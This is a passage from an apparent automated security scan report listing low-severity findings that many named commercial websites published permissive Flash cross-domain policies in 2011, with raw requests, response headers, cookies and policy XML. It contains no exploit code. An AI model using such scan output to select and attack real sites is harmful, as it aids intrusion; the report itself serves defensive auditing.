<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

7.439. http://www.superpages.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.superpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:28 GMT
Server: Unspecified
Vary: Host
Last-Modified: Tue, 29 Mar 2011 15:26:29 GMT
ETag: "1b6e-d7-af271340"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 13:39:28 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.kewlbox.com" />
</cross
...[SNIP]...

7.440. http://www.symantec.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Cache-Control: public, max-age=2219
Date: Sat, 02 Apr 2011 13:26:53 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

7.441. http://www.t-mobile.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.t-mobile.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 10 Aug 2009 20:02:39 GMT
Accept-Ranges: bytes
ETag: "8099f83f519ca1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Content-Length: 603

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="207.211.37.60"/>
   <allow-access-from domain="t-mobile.com"/>
   <allow-access-from domain="*.t-mobile.com"/>
   <allow-access-from domain="es.t-mobile.com"/>
   <allow-access-from domain="estmobile.convertlanguage.com"/>
   <allow-access-from domain="support.t-mobile.com"/>
   <allow-access-from domain="*.tmocache.com"/>
...[SNIP]...

7.442. http://www.tagged.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:08 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "25b7fc-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

7.443. http://www.target.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.target.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.target.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:20 GMT
Server: Server
Last-Modified: Fri, 14 Jan 2011 22:27:33 GMT
ETag: "13d-f0bf5f40"
Accept-Ranges: bytes
Content-Length: 317
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.target.com" />
...[SNIP]...

7.444. http://www.tarot.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tarot.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:57 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
Last-Modified: Thu, 28 Oct 2010 18:08:21 GMT
ETag: "2f1af0-b0-493b13a276f40"
Accept-Ranges: bytes
Content-Length: 176
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.yourminis.com"/>
</cross-domain-policy>

7.445. http://www.tasteofhome.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tasteofhome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tasteofhome.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:51:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: application/xml; charset=utf-8
Content-Length: 430

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="72.3.226.28" secure="true" />
...[SNIP]...
<allow-access-from domain="*.isg-marketing.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tasteofhome.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.reimanpub.com" secure="true" />
...[SNIP]...

7.446. http://www.telegraph.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telegraph.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"1150-1301643454000"
Last-Modified: Fri, 01 Apr 2011 07:37:34 GMT
Content-Length: 1150
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:59 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="telegraph.co.uk"/>
<allow-access-from domain="*.telegraph.co.uk"/>
<allow-access-from domain="telegraphquiz.cfmx.flarecreative.com"/>
<allow-access-from domain="213.187.32.58"/>
<allow-access-from domain="213.187.48.185"/>
<allow-access-from domain="tgquiz.pavo.flarecreative.com"/>
<allow-access-from domain="ad.uk.doubleclick.net"/>
<allow-access-from domain="st.sand.msn-int.com" secure="true"/>
<allow-access-from domain="*.msn.com" secure="true"/>
<allow-access-from domain="services.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.videoegg.com"/>
<allow-access-from domain="*.bebo.com"/>
<allow-access-from domain="*.hi5.com"/>
<allow-access-from domain="*.wayn.com"/>
<allow-access-from domain="*.tagged.com"/>
<allow-access-from domain="*.ringo.com"/>
<allow-access-from domain="dailytelegraph.accuweather.com"/>
<allow-access-from domain="skin.issuu.com" />
<allow-access-from domain="static.issuu.com" />
<allow-access-from domain="bestbuys.tmg.s3.amazonaws.com" />
<allow-access-from domain="*.washingtonpost.com" />
...[SNIP]...

7.447. http://www.thefrisky.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefrisky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefrisky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 19 May 2010 20:33:54 GMT
ETag: "1ad31f-ff-486f86063b080"
Accept-Ranges: bytes
Content-Length: 255
Content-Type: text/xml
Cache-Control: max-age=208322
Date: Sat, 02 Apr 2011 13:33:13 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.turner.com" />
<allow-access-from domain="*.thefrisky.com" />
...[SNIP]...

7.448. http://www.thirdage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thirdage.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Varnish: 635032720
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:40:55 GMT
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Drupal-Cache: MISS
X-Varnish-Cache: MISS
Web-Head: web09.advomatic.com
Via: 1.1 varnish
Connection: close
Last-Modified: Sat, 02 Apr 2011 13:40:55 +0000
X-Powered-By: PHP/5.2.6-1+lenny9
Age: 0
Content-Length: 267

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.thirdage.com" />
<allow-access-from domain="*.www.thirdage.com" />
...[SNIP]...

7.449. http://www.ticketmaster.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "4c3-b383d900"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:24:52 GMT
Connection: close
Set-Cookie: SID=jrXWRzktqCwRzz16qiA4zQ0W2flVKZEniPvK5uxMvQ4Gfx_GwXru5DUOn80tbDCL_KoHKSFmkyaATJd6; path=/; domain=.ticketmaster.com
Set-Cookie: BID=5RMDQStWthnUtUuXYQ0pCAVC6zrpzTDWi214mGhkR1p2xGpyCJh0D3F3LJvkexWGjXbwtGCUvwxER0HdQekm; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=XrPER0aDfUK1iRLntV5jCejZQ4h2SKcKRhEFfxWHOjraechpoisySw==; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.com" />
...[SNIP]...
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...

7.450. http://www.tigerdirect.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 794
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT
Accept-Ranges: bytes
ETag: "38d3bcb31951cb1:8574"
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:17 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.compusa.com" />
<allow-access-from domain="*.compusa.pr" />
<allow-access-from domain="images.highspeedbackbone.net" />
...[SNIP]...
<allow-access-from domain="retail.tigerdirect.com" />
   <allow-access-from domain="www.tigerdirect.ca" />
<allow-access-from domain="retail.tigertirect.ca" />
   <allow-access-from domain="www.circuitcity.com" />
   <allow-access-from domain="com.puter.tv" />
   <allow-access-from domain="compusa.tv" />
   <allow-access-from domain="pinkfriday.org" />
   <allow-access-from domain="charitypcrace.com" />
...[SNIP]...

7.451. http://www.tinypic.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tinypic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tinypic.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:37:28 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT
ETag: "394-39350380"
Accept-Ranges: bytes
Content-Length: 916
Age: 234
X-Cache: HIT from tinypic.com
Via: 1.0 den2tpsq04:80 (squid)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="tinypic.com" />
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="photobucket.com" />
<allow-access-from domain="*.dancejam.com" />
<allow-access-from domain="dancejam.com" />
<allow-access-from domain="*.fotoflexer.com"/>
<allow-access-from domain="fotoflexer.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="flektor.com"/>
<allow-access-from domain="*.picnik.com"/>
<allow-access-from domain="picnik.com"/>
<allow-access-from domain="*.glogster.com"/>
<allow-access-from domain="glogster.com"/>
...[SNIP]...

7.452. http://www.tmz.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tmz.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:29 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:01:17 GMT
ETag: "12383e6-3c6-486f7152a9940"
Accept-Ranges: bytes
Content-Length: 966
Connection: close
Content-Type: application/xml
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<cross-domain-policy>
<allow-access-from domain="*.tmz.com"/>
<allow-access-from domain="*.tmzdev.com"/>
<allow-access-from domain="*.blogsmithmedia.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.symbolforce.com"/>
<allow-access-from domain="*.yourminis.com"/>
<allow-access-from domain="*.tmz.vo.llnwd.net"/>
<allow-access-from domain="creative.myspace.com"/>
<allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="creative.myspacecdn.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.celebritytweet.com"/>
<allow-access-from domain="adserver.adtechus.com"/>
<allow-access-from domain="aka-cdn-ns.adtechus.com"/>
<allow-access-from domain="cdn.tremormedia.com"/>
<allow-access-from domain="adserver.adtech.de"/>
<allow-access-from domain="aka-cdn-ns.adtech.de"/>
<allow-access-from domain="t-ll-assets.cfec2.net"/>
...[SNIP]...

7.453. http://www.toptenreviews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toptenreviews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toptenreviews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:38 GMT
Server: Apache
Last-Modified: Thu, 05 Nov 2009 17:31:54 GMT
ETag: "6a4059-153-477a31a739680"
Accept-Ranges: bytes
Content-Length: 339
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFil
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

7.454. http://www.toyota.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toyota.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 11 Oct 2010 22:20:04 GMT
ETag: "2515a-487-c30f8d00"
Accept-Ranges: bytes
Content-Length: 1159
Content-Type: application/xml
X-N: S
Date: Sat, 02 Apr 2011 13:50:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="toyota.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.toyota.com" secure="false" />
...[SNIP]...
<allow-access-from domain="toyotareasons.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.toyotareasons.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.firstbornmultimedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ichameleongroup.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*. clearspring.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*. lolzllc.com" secure="false" />
...[SNIP]...

7.455. http://www.toysrus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toysrus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toysrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:24 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT
ETag: "540db5-39b-48bf5ef3f6400"
Accept-Ranges: bytes
Content-Length: 923
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:32:24 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.toysrus.com" />
<allow-access-from domain="www.babiesrus.com" />
<allow-access-from domain="trus.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="63.240.110.201" />
<allow-access-from domain="206.16.220.201" />
<allow-access-from domain="172.20.1.201" />
<allow-access-from domain="172.21.1.201" />
<allow-access-from domain="vqascweb1.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vqascweb2.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="toysrus.shoplocal.com" secure="true" />
...[SNIP]...
<allow-access-from domain="beta.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

7.456. http://www.tracfone.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tracfone.com

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2994269697; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Connection: close
Date: Sat, 02 Apr 2011 13:33:19 GMT
Content-Length: 568
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.15&agentName=TRAC&servletName=FileServlet&agentHost=dp-web5&agentProcess=WebLogic
Set-Cookie: TLTSID=F445257AC78A7253BF1B78ED0006C6C8; path=/
Set-Cookie: TLTUID=721D822B71F8142E41E245115059866A; expires=Sunday, 01-Apr-2012 13:33:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF8780AF82D0F0117BCBAFB313C34

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...

7.457. http://www.travelocity.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.travelocity.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
